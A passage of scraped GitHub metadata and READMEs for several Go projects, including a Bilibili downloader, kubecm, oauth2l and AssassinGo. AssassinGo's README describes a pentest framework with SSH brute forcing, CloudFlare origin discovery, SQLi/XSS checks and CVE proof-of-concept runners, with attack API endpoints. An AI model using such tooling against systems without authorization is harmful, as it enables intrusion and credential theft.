tool](https://github.com/kevinyan815/gocookbook/issues/23)\n - [Current Limiting Algorithm Counter](https://github.com/kevinyan815/gocookbook/issues/29)\n - [Sliding window of current limiting algorithm](https://github.com/kevinyan815/gocookbook/issues/26)\n - [Leaky Bucket of Current Limiting Algorithm](https://github.com/kevinyan815/gocookbook/issues/28)\n - [Token Bucket of Current Limiting Algorithm](https://github.com/kevinyan815/gocookbook/issues/27)\n - [Concurrent interesting question--H2O manufacturing factory](https://github.com/kevinyan815/gocookbook/issues/33)\n - [Self-explainable Token generation algorithm](https://github.com/kevinyan815/gocookbook/blob/master/codes/gen_token/main.go)\n - [Algorithm for generating traceid and spanid for distributed link tracking](https://github.com/kevinyan815/gocookbook/blob/master/codes/trace_span/main.go)\n - [An HTTP client with blocking rate limiter](https://github.com/kevinyan815/gocookbook/blob/master/codes/http_client_with_rate/http_rl_client.go)\n - [AES encryption and decryption, HMAC signature verification](https://github.com/kevinyan815/gocookbook/blob/master/codes/crypto_utils/aes.go)\n- gRPC application practice\n - [interceptor interceptor --gRPC Middleware](https://github.com/kevinyan815/gocookbook/issues/60)\n- Go Service Governance\n - [Let the Go process monitor its own resource usage](https://github.com/kevinyan815/gocookbook/issues/71)\n - [Scheme design ideas for automatic sampling performance analysis of Go services] (https://github.com/kevinyan815/gocookbook/issues/72)\n - [From Go log library to Zap, how to create a useful and practical Logger](https://mp.weixin.qq.com/s/Jh2iFY5uGe0qCFdKZWjotA)\n - [How to connect the logs of distributed services] (https://mp.weixin.qq.com/s/M2jNnLkYaearwyRERnt0tA)\n- Go unit test clearance guide\n - [go test toolset and table tests](https://github.com/kevinyan815/gocookbook/issues/75)\n - [Simulate network requests and interface calls](https://github.com/kevinyan815/gocookbook/issues/76)\n - [Mock test for native database query](https://github.com/kevinyan815/gocookbook/issues/77)\n - [Mock test of database ORM](https://github.com/kevinyan815/gocookbook/issues/80)\n - [Mock interface implementation and interface piling](https://github.com/kevinyan815/gocookbook/issues/78)\n - [Introduction to the use of the all-round piling tool Go Monkey](https://github.com/kevinyan815/gocookbook/issues/79)\n - [How to write testable code](https://github.com/kevinyan815/gocookbook/issues/81)\n - [Use unit tests to discover hidden dangers of coroutine leaks](https://mp.weixin.qq.com/s/XrhdU95CswLGwS0CLxqZmg)\n - [Go 1.18 fuzzing tutorial](https://mp.weixin.qq.com/s/7I0zB_AsltzDLmc9ew48Bg)", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "AmyangXYZ/AssassinGo", "link": "https://github.com/AmyangXYZ/AssassinGo", "tags": [], "stars": 544, "description": "An extensible and concurrency pentest framework in Go, also with WebGUI. Feel free to CONTRIBUTE!", "lang": "Go", "repo_lang": "", "readme": "![](./logo.jpg)\n\n[![Rawsec's CyberSecurity Inventory](https://inventory.raw.pm/img/badges/Rawsec-inventoried-FF5050_flat.svg)](https://inventory.raw.pm/tools.html#AssassinGo)\n[![MIT License](https://img.shields.io/badge/license-MIT-blue.svg?style=flat)](http://choosealicense.com/licenses/mit/)\n\n# AssassinGo\n\nAssassinGo is an extensible and concurrency information gathering and vulnerability scanning framework, with WebSocket based [Web GUI](https://github.com/U1in/AssassinGo-Front-End).\n\nJust for learn, welcome PR.\n\n## Features\n\n- [x] Retrieve Security Headers\n- [x] Bypass CloudFlare\n- [x] Detect CMS Version\n- [x] Honeypot Detect\n- [x] Port Scan\n- [x] Trace Route and Mark on Google Map\n- [x] Subdomain Scan\n- [x] Dir Scan and Site Map\n- [x] Whois Lookup\n- [x] Crawl the Paramed URLs\n- [x] Basic SQLi Check\n- [x] Basic XSS Check\n- [x] Intruder\n- [x] SSH Bruter\n- [x] Google-Hacking with Headless-Chrome\n- [x] Friendly PoC Interface\n- [x] Web GUI(using WebSocket)\n- [ ] Generate Report\n\n## Installation\n\n### localhost\n\n```bash\ngit clone https://github.com/AmyangXYZ/AssassinGo\ncd AssassinGo\ndocker-compose up --build -d\ncat backup.sql | docker exec -i assassingo_mariadb_1 /usr/bin/mysql -uag --password=password ag\n```\n\nThen visit http://127.0.0.1:8000 and login as admin:admin\n\n### VPS\n\nIf you want to deploy on your VPS, please clone the [Frontend](https://github.com/U1in/AssassinGo-Front-End) and modify the `base_url` of AJAX and WebSocket, then run `npm run build` and copy the output to `web/` directory as [deploy.sh](./deploy.sh) says.\n\nRemember to add your google-map key in `index.html`.\n\n## Demo\n\n![base](demo/demo1.png)\n\n![traceroute](demo/demo2.png)\n\n![subdomain](demo/demo6.png)\n\n![intruder](demo/demo9.png)\n\n![seek](demo/demo8.png)\n\n![poc](demo/demo3.png)\n\n## Outline Design\n\nI choose **Composite Pattern** to increase expansibility.\n\n![design-pattern](./design-pattern.png)\n\n## API\n\n### AJAX\n\nPath | Method | Func | Params | Return\n----- | ----- | ----- | ----- | -----\n/token | POST | sign in | username=admin&password=adminn | {SG_Token:\"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE1M\u2026W4ifQ.qY-k5f54CrQ6_dNdjgQgqjh5xS8iFZOjTLcfMfirY0w\" (stored in cookie)}\n/api/target | POST | set a target | target=xxx OR targets=t1,t2... | nil\n/api/info/basic | GET | get ip and retrieve security headers | nil | {data:{\"ip\": \"192.168.1.1\", \"webserver\": \"nginx\",\"click_jacking_protection\":true,\"content_security_policy\":false,\"strict_transport_security\":false,\"x_content_type_options\":true}\n/api/info/bypasscf | GET | find real ip behind cloudflare | nil | {\"real_ip\":\"123.123.123.123\"}\n/api/info/cms | GET | detect cms | nil | {data:{\"cms\": \"wordpress\"}}\n/api/info/honeypot | GET | get ip and webserver | nil | {data:{\"score\": \"0.3\"}}\n/api/info/whois | GET | whois | nil | {data:{\"domain\":\"example.com\",\"registrar_name\":\"alibaba\", \"admin_name\":\"xiaoming\", \"admin_email\":\"a@qq.com\", \"admin_phone\":\"+86.12312345678\", \"created_date\":\"2016-07-28T12:57:53.0Z\",\"expiration_date\":\"2018-07-28T12:57:53.0Z\", \"ns\":\"dns9.hichina.com\", \"state\":\"clienttransferprohibited\"}}\n/api/poc | GET | get poc list | nil | {data:{\"poc_list\":[\"drupal-rce\":{\"id\":\"CVE-2017-7602\",\"ty## pe\":\"remote code execution\",\"text\":\"biubiubiu\",\"platform## \":\"php\",\"data\":\"2018-04-25\",## \"reference\":\"https://cve.mitre.org/cgi-## bin/cvename.cgi?name=CVE-2018-7602\"},\"seacms-v654-rce\"]## }}\n/api/poc/:poc | GET | run the specified poc | nil | {data:{\"host\": \"example.com\", \"exploitable\":\"true\"}}\n\n### WebSocket\n\nPath | Func | Params | Return\n----- | ----- | ----- | -----\n/ws/info/port | port scan | nil | {\"port\": \"80\", \"service\": \"http\"}\n/ws/info/tracert | trace route and mark on google map | nil | {\"ttl\": 1, \"addr\": 192.168.1.1, \"elapsed_time\": 22720440, \"country\": China, \"lat\": 34.2583,\"long\": 116.1614}\n/ws/info/subdomain | enmu subdomain | nil | {\"subdomain\":\"earth.google.com\"}\n/ws/info/dirb | brute force dir | {\"concurrency\":20, \"dict\":\"php\"}; {\"stop\":1} | {\"path\": \"admin.php\", \"resp_status\": 200, \"resp_len\": 110}\n/ws/attack/crawl | crawl paramed urls | {\"max_depth\": 4} | {\"url\": \"example.com/?id=1\"}\n/ws/attack/sqli | check sqli | nil | {\"sqli_url\": \"example.com/?id=1}\n/ws/attack/xss | check xss | nil | {\"xss_url\": \"example.com/?id=1}\n/ws/attack/intrude | brute force | {\"header\": \"GET / HTTP/1.1 ...\", \"payload\": \"p1,p2...\", \"concurrency\": \"10\"}; {\"stop\":1}| {\"payload\": 1, \"resp_status\": 200, \"resp_len\": 110}\n/ws/attack/ssh | brute force ssh | {\"port\":\"22\",, \"concurrency\":40} | {\"user\":\"root\",\"passwd\":\"biubiubiu\"}\n/ws/seek | seek targets | {\"query\": \"biu\", \"se\": \"bing/google\", \"max_page\": 10} | {\"urls\": urls}\n/ws/poc/:poc | run poc | {concurrency:10} | {\"exploitable_host\": \"example.com\"}\n\n## License\n\nMIT\n", "readme_type": "text", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sodaling/FastestBilibiliDownloader", "link": "https://github.com/sodaling/FastestBilibiliDownloader", "tags": ["bilibili", "video-downloader"], "stars": 544, "description": "B\u7ad9\u89c6\u9891\u6781\u901f\u6279\u91cf\u4e0b\u8f7d\u5668|The fastest Bilibili video downloader", "lang": "Go", "repo_lang": "", "readme": "# FastestBibiliDownloader\n\n## Original project address: **[ FastestBilibiliDownloader](https://github.com/sodaling/FastestBilibiliDownloader)**\n\n> The project is only for learning and communication, please do not use it for any commercial purposes!\n\n## \u2b50 Added\n\nAutomatically parse **want to download video URL / UP main personal homepage URL**, support:\n\n- [x] [https://www.bilibili.com/video/**old av number**/](#), the av number is a string of numbers starting with `av`**\n- [x] [https://www.bilibili.com/video/**New version of BV number**/](#), BV number is a string of characters starting with `BV`**\n- [x] [https://space.bilibili.com/**UP master\u2019s ID**/](#), the UP master\u2019s ID is **a string of numbers**\n\n![demo.png](demo.png)\n\n## \u26a0Compared to the deletion of the original project\n\n+ Because FFmeg splicing and conversion takes too long, the function in `video merge` has been removed. The downloaded video is in `.flv` format.\n\n-----\n\n## \ud83d\udc4dOriginal project description\n\n**The second fastest Bilibili.com (B station) video downloader in the Eastern Hemisphere! **\n\nIf you want to download all the videos of a certain up master at station b, and you want to download fast, then you can try this project-.-\n\nThere are currently two (three) video download options available:\n\n1. Download a single video through the aid of the video.\n2. Through the upid of the up master (B station is called mid), download all the videos contributed by the up master.\n3. Download a single video through the BVid of the video. **(new)**\n\n\n> Features:\n>\n> There are already a lot of video codes downloaded from station b on Github. So what are the characteristics of this downloader?\n>\n> Because this is written in Golang, of course, it also uses the characteristics of Golang: goroutine.\n>\n> Simply put, the features are:\n>\n> **FAST! FAST! The more videos you download, the faster! **\n>\n> * When a single aid video is divided into several parts, or when you choose to download all videos under the up master, multiple videos will be downloaded in parallel at the same time, and it is definitely not a problem to run up to your network speed.\n> * Downloading and merging videos are processed in parallel. If the video is divided into multiple parts, they will be merged immediately when the download is completed. The video merging process and other downloading and merging are performed at the same time and do not affect each other.\n\n### run\n\nThe downloaded temporary videos will be stored in the **download** folder under the running path, and each video (aid) has a folder, with **aid_video title** as the folder name.\nThe final video will be stored in the **output** folder under the running path, one folder for each aid, with **video title** as the folder name.\n```shell\ngo run cmd/start-concurrent-engine.go -h # get parameters\n```\n\n\n\n#### Use the Golang compilation environment\n\n1. Install the Golang compilation environment\n* Ubuntu\n```shell\nsudo apt install golang\n```\n\n1.1 If you are in mainland China, there is a high probability that you may need to configure a proxy to proceed to the next step.\n```shell\ngo env -w GO111MODULE=on #Enable Go Moledules\ngo env -w GOPROXY=https://goproxy.io #Use official proxy\n```\n\n2. Run FastestBibiliDownloader once\nThe program entry is in **cmd/start-concurrent-engine.go**, only need\n```shell\ngo run cmd/start-concurrent-engine.go -t (aid/bvid/upid) -v (id)\n```\nThe first run will take time to download a lot of stuff, and then just follow the prompts.\nNote that merging videos requires the support of FFmpeg. Otherwise, it will only download and not automatically merge. Please consult the search engine for the installation tutorial of FFmpeg.\n\n3. Compile FastestBibiliDownloader\n```shell\ngo build cmd/start-concurrent-engine.go -t (aid/bvid/upid) -v (id)\n```\nThen run ./start-concurrent-engine directly.\n\n#### If you do not have a Golang compilation environment, or do not have a FFmeg environment. Then it is recommended to run in docker mode. The dockefile and makefile have been written. You just need:\n\n ```shell\n $ cd FastestBilibiliDownloader\n $ make build #Download image\n $ make run #run the image\n ```\n\n \n\n#### The bin file will be packaged to the release when there is time later.\n\n### grateful\n\n1. The frame reference of the engine part **ccmouse**I have adjusted the overall structure part later, thank you very much.\n2. [bilibili-downloader](https://github.com/stevenjoezhang/bilibili-downloader): The API for requesting videos at station b is obtained from this code, and the py code comments are also very clear and very grateful.\n3. @sshwy helps to catch bugs and correct errors\n4. @justin201802 took the trouble to help modify\n\n>Welcome to mention pr or fork or whatever, if it can help you, welcome to star! The product of the boring time spent at home during the epidemic, it is a bit rough, everyone is welcome to improve~", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "lc/subjs", "link": "https://github.com/lc/subjs", "tags": [], "stars": 544, "description": "Fetches javascript file from a list of URLS or subdomains.", "lang": "Go", "repo_lang": "", "readme": "# subjs\r\n[![License](https://img.shields.io/badge/license-MIT-_red.svg)](https://opensource.org/licenses/MIT)\r\n[![Go ReportCard](https://goreportcard.com/badge/github.com/lc/gau)](https://goreportcard.com/report/github.com/lc/subjs)\r\n\r\nsubjs fetches javascript files from a list of URLS or subdomains. Analyzing javascript files can help you find undocumented endpoints, secrets, and more.\r\n\r\nIt's recommended to pair this with [gau](https://github.com/lc/gau) and then [https://github.com/GerbenJavado/LinkFinder](https://github.com/GerbenJavado/LinkFinder)\r\n\r\n# Resources\r\n- [Usage](#usage)\r\n- [Installation](#installation)\r\n\r\n## Usage:\r\nExamples:\r\n```bash\r\n$ cat urls.txt | subjs \r\n$ subjs -i urls.txt\r\n$ cat hosts.txt | gau | subjs\r\n```\r\n\r\nTo display the help for the tool use the `-h` flag:\r\n\r\n```bash\r\n$ subjs -h\r\n```\r\n\r\n| Flag | Description | Example |\r\n|------|-------------|---------|\r\n| `-c` | Number of concurrent workers | `subjs -c 40` |\r\n| `-i` | Input file containing URLS | `subjs -i urls.txt` |\r\n| `-t` | Timeout (in seconds) for http client (default 15) | `subjs -t 20` |\r\n| `-ua` | User-Agent to send in requests | `subjs -ua \"Chrome...\"` |\r\n| `-version` | Show version number | `subjs -version\"` |\r\n\r\n\r\n## Installation\r\n### From Source:\r\n\r\n```\r\n$ GO111MODULE=on go get -u -v github.com/lc/subjs@latest\r\n```\r\n\r\n### From Binary\r\nYou can download the pre-built [binaries](https://github.com/lc/subjs/releases/) from the releases page and then move them into your $PATH.\r\n\r\n```\r\n$ tar xvf subjs_1.0.0_linux_amd64.tar.gz\r\n$ mv subjs /usr/bin/subjs\r\n```\r\n\r\n## Useful?\r\n\r\n\"Buy\r\n", "readme_type": "markdown", "hn_comments": "Tomte: you've submitted this numerous times.Any specific discussion you're hoping to spark?project-based / depth first learning is a better approach; you will simply implement what you need to from the platonic algorithms rather than mindlessly go through the tasks", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "sunny0826/kubecm", "link": "https://github.com/sunny0826/kubecm", "tags": ["kubeconfig", "kubeconfig-manager", "kubernetes", "switch-namespace", "golang", "cli", "go"], "stars": 544, "description": "Manage your kubeconfig more easily.", "lang": "Go", "repo_lang": "", "readme": "

\n \"Kubecm\"\n

\n\n![Go version](https://img.shields.io/github/go-mod/go-version/sunny0826/kubecm)\n![Go](https://github.com/sunny0826/kubecm/workflows/Go/badge.svg?branch=master)\n[![Go Report Card](https://goreportcard.com/badge/github.com/sunny0826/kubecm)](https://goreportcard.com/report/github.com/sunny0826/kubecm)\n![GitHub](https://img.shields.io/github/license/sunny0826/kubecm.svg)\n[![GitHub release](https://img.shields.io/github/release/sunny0826/kubecm)](https://github.com/sunny0826/kubecm/releases)\n[![codecov](https://codecov.io/gh/sunny0826/kubecm/branch/master/graph/badge.svg?token=KGTLBQ8HYZ)](https://codecov.io/gh/sunny0826/kubecm)\n[![CII Best Practices](https://bestpractices.coreinfrastructure.org/projects/6065/badge)](https://bestpractices.coreinfrastructure.org/projects/6065)\n\n```text\n \n Manage your kubeconfig more easily. \n \n\n\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588 \u2588\u2588\u2588 \n\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588 \n\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588 \u2588\u2588 \n\u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \u2588\u2588 \n\u2588\u2588 \u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588\u2588\u2588\u2588\u2588 \u2588\u2588 \u2588\u2588\n\n Tips Find more information at: https://kubecm.cloud\n\nUsage:\n kubecm [command]\n\nAvailable Commands:\n add Add KubeConfig to $HOME/.kube/config\n alias Generate alias for all contexts\n clear Clear lapsed context, cluster and user\n cloud Manage kubeconfig from cloud\n completion Generate completion script\n create Create new KubeConfig(experiment)\n delete Delete the specified context from the kubeconfig\n help Help about any command\n list List KubeConfig\n merge Merge multiple kubeconfig files into one\n namespace Switch or change namespace interactively\n rename Rename the contexts of kubeconfig\n switch Switch Kube Context interactively\n version Print version info\n\nFlags:\n --config string path of kubeconfig (default \"$HOME/.kube/config\")\n -h, --help help for kubecm\n --ui-size int number of list items to show in menu at once (default 4)\n\nUse \"kubecm [command] --help\" for more information about a command.\n```\n\n## Documentation\n\nFor full documentation, please visit the KubeCM website: [https://kubecm.cloud](https://kubecm.cloud)\n\n## Demo\n\n[![asciicast](https://asciinema.org/a/389595.svg)](https://asciinema.org/a/389595)\n\n## Install\nUsing [Krew](https://krew.sigs.k8s.io/):\n\n```bash\nkubectl krew install kc\n```\n\nUsing Homebrew:\n\n```bash\nbrew install kubecm\n```\n\nSource binary:\n\n[Download the binary](https://github.com/sunny0826/kubecm/releases)\n\n## Contribute\n\nFeel free to open issues and pull requests. Any feedback is highly appreciated!\n\n## Star History\n\n[![Star History Chart](https://api.star-history.com/svg?repos=sunny0826/kubecm&type=Date)](https://star-history.com/#sunny0826/kubecm)\n\n\n## Thanks\n\n- [JetBrains IDEs](https://www.jetbrains.com/?from=kubecm)\n\n

\n \n \"JetBrains\n \n

\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "google/oauth2l", "link": "https://github.com/google/oauth2l", "tags": [], "stars": 543, "description": "oauth2l (\"oauth tool\") is a simple CLI for interacting with Google API authentication.", "lang": "Go", "repo_lang": "", "readme": "## oauth2l\n\n`oauth2l` (pronounced \"oauth tool\") is a simple command-line tool for\nworking with\n[Google OAuth 2.0](https://developers.google.com/identity/protocols/OAuth2)\nwritten in Go. Its primary use is to fetch and print OAuth 2.0 access\ntokens, which can be used with other command-line tools and shell scripts.\n\n## Overview\n\n`oauth2l` supports all Google OAuth 2.0 authentication flows for both user\naccounts and service accounts in different environments:\n\n- When running inside Google Compute Engine (GCE) and Google Kubernetes\n Engine (GKE), it uses the credentials of the current service account\n if it is available.\n\n- When running inside user context that has an active Google Cloud SDK\n (gcloud) session, it uses the current gcloud credentials.\n\n- When running with command option `--credentials xxx`, where `xxx` points to\n a JSON credential file downloaded from\n [Google Cloud Console](https://console.cloud.google.com/apis/credentials),\n `oauth2l` uses the file to start an OAuth session. The file can be\n either a service account key or an OAuth client ID.\n\n- When running with command option `--type jwt --audience xxx` and a service\n account key, a JWT token signed by the service account key will be generated.\n\n- When running with command option `--type sso --email xxx`, `oauth2l` invokes\n an external `sso` command to retrieve Single Sign-on (SSO) access token.\n\n- By default, retrieved tokens will be cached and stored in \"~/.oauth2l\".\n The cache location can be overridden via `--cache xxx`. To disable\n caching, set cache location to empty (\"\").\n\n## Quickstart\n\n### Pre-compiled binaries\n\nPre-built binaries are available for Darwin (Mac OS X), Linux, and Windows. You\ncan download a build for any tag, for example:\n\n| OS | Link |\n| ------- | --------------------------------------------------------------- |\n| Darwin | https://storage.googleapis.com/oauth2l/latest/darwin_amd64.tgz |\n| Linux | https://storage.googleapis.com/oauth2l/latest/linux_amd64.tgz |\n| Windows | https://storage.googleapis.com/oauth2l/latest/windows_amd64.tgz |\n\nSubstitute \"latest\" for any tag version you'd like, removing any leading \"v\"\nprefix.\n\n### Homebrew (Mac OS X)\n\nOn Mac OS X, you can install `oauth2l` via [Homebrew](https://brew.sh):\n\n```bash\n$ brew install oauth2l\n```\n\nNote that new releases may not be immediately available via Homebrew because\nupdating is a manual process.\n\n### Docker\n\nAn official Docker image is available at:\n\n```text\ngcr.io/oauth2l/oauth2l\n```\n\nYou can run this directly:\n\n```sh\n$ docker run -it gcr.io/oauth2l/oauth2l header cloud-platform\n```\n\nOr use it to inject into an existing container:\n\n```dockerfile\nFROM my-awesome-container\nCOPY --from gcr.io/oauth2l/oauth2l /bin/oauth2l /bin/oauth2l\n```\n\nLike the binary releases, the container images are tagged to match the\nrepository tags (without the leading \"v\"). For master builds, use the \"latest\"\ntag.\n\n### Everywhere else\n\nOn other systems, you need to meet the following requirements to use this tool:\n\n**Minimum requirements:**\n\n- The tool is only available for _Linux_ or _Mac_\n- _Go 1.10.3_ or higher\n\n**Nice to have:**\n\n- Add your _\\$GOPATH/bin_ into your _\\$PATH_ ([instructions](https://github.com/golang/go/wiki/GOPATH))\n\n```bash\n# Get the package from Github\n$ git clone https://github.com/google/oauth2l\n$ cd oauth2l\n\n# Install the package into your $GOPATH/bin/\n$ make dev\n\n# Fetch the access token from your credentials with cloud-platform scope\n$ ~/go/bin/oauth2l fetch --credentials ~/your_credentials.json --scope cloud-platform\n\n# Or you can run if you $GOPATH/bin is already in your $PATH\n$ oauth2l fetch --credentials ~/your_credentials.json --scope cloud-platform\n```\n\n## Commands\n\n### fetch\n\nFetch and print an access token for the specified OAuth scopes. For example,\nthe following command prints access token for the following OAuth2 scopes:\n\n- https://www.googleapis.com/auth/userinfo.email\n- https://www.googleapis.com/auth/cloud-platform\n\n```bash\n$ oauth2l fetch --scope userinfo.email,cloud-platform\nya29.zyxwvutsrqpnmolkjihgfedcba\n```\n\n### header\n\nThe same as `fetch`, except the output is in HTTP header format:\n\n```bash\n$ oauth2l header --scope cloud-platform\nAuthorization: Bearer ya29.zyxwvutsrqpnmolkjihgfedcba\n```\n\nThe `header` command is designed to be easy to use with the `curl` CLI. For\nexample, the following command uses the PubSub API to list all PubSub topics.\n\n```bash\n$ curl -H \"$(oauth2l header --scope pubsub)\" https://pubsub.googleapis.com/v1/projects/my-project-id/topics\n```\n\nTo send an API request using domain-wide delegation (DwD), for example, to\nlist `user@example.com`'s Gmail labels:\n\n```bash\n$ curl -H \"$(oauth2l header --email user@example.com --credentials service_account_credentials.json --scope https://www.googleapis.com/auth/gmail.labels)\" https://gmail.googleapis.com/gmail/v1/users/me/labels\n```\n\n### curl\n\nThis is a shortcut command that fetches an access token for the specified OAuth\nscopes and uses the token to make a curl request (via 'usr/bin/curl' by\ndefault). Additional flags after \"--\" will be treated as curl flags.\n\n```bash\n$ oauth2l curl --scope cloud-platform,pubsub --url https://pubsub.googleapis.com/v1/projects/my-project-id/topics -- -i\n```\n\nTo send an API request using domain-wide delegation (DwD), for example, to\nlist `user@example.com`'s Gmail labels:\n\n```bash\n$ oauth2l curl --email user@example.com --credentials service_account_credentials.json --scope https://www.googleapis.com/auth/gmail.labels --url https://gmail.googleapis.com/gmail/v1/users/me/labels\n```\n\n\n### info\n\nPrint information about a valid token. This always includes the list of scopes\nand expiration time. If the token has either the\n`https://www.googleapis.com/auth/userinfo.email` or\n`https://www.googleapis.com/auth/plus.me` scope, it also prints the email\naddress of the authenticated identity.\n\n```bash\n$ oauth2l info --token $(oauth2l fetch --scope pubsub)\n{\n \"expires_in\": 3599,\n \"scope\": \"https://www.googleapis.com/auth/pubsub\",\n \"email\": \"user@gmail.com\"\n ...\n}\n```\n\n### test\n\nTest a token. This sets an exit code of 0 for a valid token and 1 otherwise,\nwhich can be useful in shell pipelines. It also prints the exit code.\n\n```bash\n$ oauth2l test --token ya29.zyxwvutsrqpnmolkjihgfedcba\n0\n$ echo $?\n0\n$ oauth2l test --token ya29.justkiddingmadethisoneup\n1\n$ echo $?\n1\n```\n\n### reset\n\nReset all tokens cached locally. We cache previously retrieved tokens in the\nfile `~/.oauth2l` by default.\n\n```bash\n$ oauth2l reset\n```\n\n### web\n\nLocally deploys and launches the OAuth2l Playground web application in a browser. If the web application packages are not yet installed, it will be installed under `~/.oauth2l-web` by default. See Command Options section for all supported options for the web command.\n\nNote that a local installation of Docker and docker-compose tool is required in order to support this feature. For most platforms, Docker can be installed by following the instructions [here](https://docs.docker.com/get-docker/). For Google workstations, follow special installation procedures at \"go/installdocker\". The web feature is currently experimental and will be improved in the future.\n\n```bash\n$ oauth2l web\n```\n\n## Command Options\n\n### --help\n\nPrints help messages for the main program or a specific command.\n\n```bash\n$ oauth2l --help\n```\n\n```bash\n$ oauth2l fetch --help\n```\n\n### --credentials\n\nSpecifies an OAuth credential file (either an OAuth client ID or a Service\nAccount key) to start the OAuth flow. You can download the file from\n[Google Cloud Console](https://console.cloud.google.com/apis/credentials).\n\n```bash\n$ oauth2l fetch --credentials ~/service_account.json --scope cloud-platform\n```\n\nIf this option is not supplied, it will be read from the environment variable\nGOOGLE_APPLICATION_CREDENTIALS. For more information, please read\n[Getting started with Authentication](https://cloud.google.com/docs/authentication/getting-started).\n\n```bash\n$ export GOOGLE_APPLICATION_CREDENTIALS=\"~/service_account.json\"\n$ oauth2l fetch --scope cloud-platform\n```\n\nWhen using an OAuth client ID file, the following applies: \n \nIf the first `redirect_uris` in the `--credentials client_id.json` is set to `urn:ietf:wg:oauth:2.0:oob`,\nthe 3LO out of band flow is activated. NOTE: 3LO out of band flow has been deprecated and will stop working entirely in Oct 2022.\n\nIf the first `redirect_uris` in the `--credentials client_id.json` is set to `http://localhost[:PORT]`,\nthe 3LO loopback flow is activated. When the port is omitted, an available port will be used to spin up the localhost.\nWhen a port is provided, oauth2l will attempt to use such port. If the port cannot be used, oauth2l will stop. \n\n### --type\n\nThe authentication type. The currently supported types are \"oauth\", \"jwt\", or\n\"sso\". Defaults to \"oauth\".\n\n#### oauth\n\nWhen oauth is selected, the tool will fetch an OAuth access token through one\nof two different flows. If service account key is provided, 2-legged OAuth flow\nis performed. If OAuth Client ID is provided, 3-legged OAuth flow is performed,\nwhich requires user consent. Learn about the different types of OAuth\n[here](https://developers.google.com/identity/protocols/OAuth2).\n\n```bash\n$ oauth2l fetch --type oauth --credentials ~/client_credentials.json --scope cloud-platform\n```\n\n#### jwt\n\nWhen jwt is selected and the json file specified in the `--credentials` option\nis a service account key file, a JWT token signed by the service account private\nkey will be generated. Either `--audience` or `--scope` must be specified for\nthis option. See how to construct the audience [here](https://developers.google.com/identity/protocols/OAuth2ServiceAccount#jwt-auth).\n\n- With audience:\n ```bash\n $ oauth2l fetch --type jwt --credentials ~/service_account.json --audience https://pubsub.googleapis.com/\n ```\n\n- With scope:\n ```bash\n $ oauth2l fetch --type jwt --credentials ~/service_account.json --scope cloud-platform\n ```\n\n#### sso\n\nWhen sso is selected, the tool will use an external Single Sign-on (SSO)\nCLI to fetch an OAuth access token. The default SSO CLI only works with\nGoogle's corporate SSO. An email is required in addition to scope.\n\nTo use oauth2l with the default SSO CLI:\n\n```bash\n$ oauth2l header --type sso --email me@google.com --scope cloud-platform\n```\n\nTo use oauth2l with a custom SSO CLI:\n\n```bash\n$ oauth2l header --type sso --ssocli /usr/bin/sso --email me@google.com --scope cloud-platform\n```\n\nNote: The custom SSO CLI should have the following interface:\n\n```bash\n$ /usr/bin/sso me@example.com scope1 scope2\n```\n\n### --scope\n\nThe scope(s) that will be authorized by the OAuth access token. Required for\noauth and sso authentication types. When using multiple scopes, provide the\nthe parameter as a comma-delimited list and do not include spaces. (Alternatively,\nmultiple scopes can be specified as a space-delimited string surrounded in quotes.)\n\n```bash\n$ oauth2l fetch --scope cloud-platform,pubsub\n```\n\n### --sts\n\nIf true, exchanges the fetched access token with an STS token using Google's\nSecure Token Service. You may optionally specify claims to be embedded into\nthe STS token. The currently supported STS claims are \"audience\" and \"quota_project\".\n\nThis option is compatible with oauth and sso authentication types,\nbut is currently incompatible with jwt.\n\n```bash\n$ oauth2l fetch --sts --audience https://pubsub.googleapis.com/ --quota_project quotaprojectid\n```\n\n### --audience\n\nThe single audience to include in the signed JWT token. Required for jwt\nauthentication type. Can also be used for STS.\n\n```bash\n$ oauth2l fetch --type jwt --audience https://pubsub.googleapis.com/\n```\n\n### --quota_project\n\nThe quota project to include in the STS claim. Used for quota and billing override.\n\n```bash\n$ oauth2l fetch --sts --quota_project quotaprojectid\n```\n\n### --email\n\nThe email associated with SSO. Required for sso authentication type.\n\n```bash\n$ oauth2l fetch --type sso --email me@google.com --scope cloud-platform\n```\n\nThe email parameter can be also used to specify a user email account for domain-wide\ndelegation when authenticating with Service Account credentials.\n\n```bash\n$ oauth2l fetch --credentials ~/service_account.json --scope cloud-platform --email user@google.com\n```\n\n### --ssocli\n\nPath to SSO CLI. For optional use with \"sso\" authentication type.\n\n```bash\n$ oauth2l fetch --type sso --ssocli /usr/bin/sso --email me@google.com --scope cloud-platform\n```\n\n### --cache\n\nPath to token cache file. Disables caching if set to empty (\"\"). Defaults to ~/.oauth2l if not configured.\n\n```bash\n$ oauth2l fetch --cache ~/different_path/.oauth2l --scope cloud-platform\n```\n\n### --refresh\n\nIf true, attempt to refresh expired access token (from the cache) using refresh token instead of re-authorizing.\n\n```bash\n$ oauth2l fetch --credentials ~/client_credentials.json --scope cloud-platform --refresh\n```\n\n### 